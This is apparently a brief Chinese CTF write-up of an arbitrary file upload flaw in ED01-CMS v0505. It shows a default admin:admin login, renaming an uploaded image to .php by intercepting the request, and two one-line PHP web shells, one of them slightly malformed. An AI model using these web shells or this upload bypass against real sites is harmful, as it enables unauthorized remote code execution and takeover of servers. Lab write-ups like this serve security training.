文件上传漏洞ED01-CMS v0505 存在任意文件上传漏洞

进入登陆页面我们弱口令admin:admin登录成功；

登录后我们进入user目录上传图片；

我们上传shell.png，抓包修改为shell.php;

<?php system($_GET(1));?>or<?php @eval($_POST[cnm]);?>

上传成功后，找到图片所在位置进而获取flag

如果觉得《文件上传漏洞ED01-CMS v0505 存在任意文件上传漏洞》对你有帮助，请点赞、收藏，并留下你的观点哦！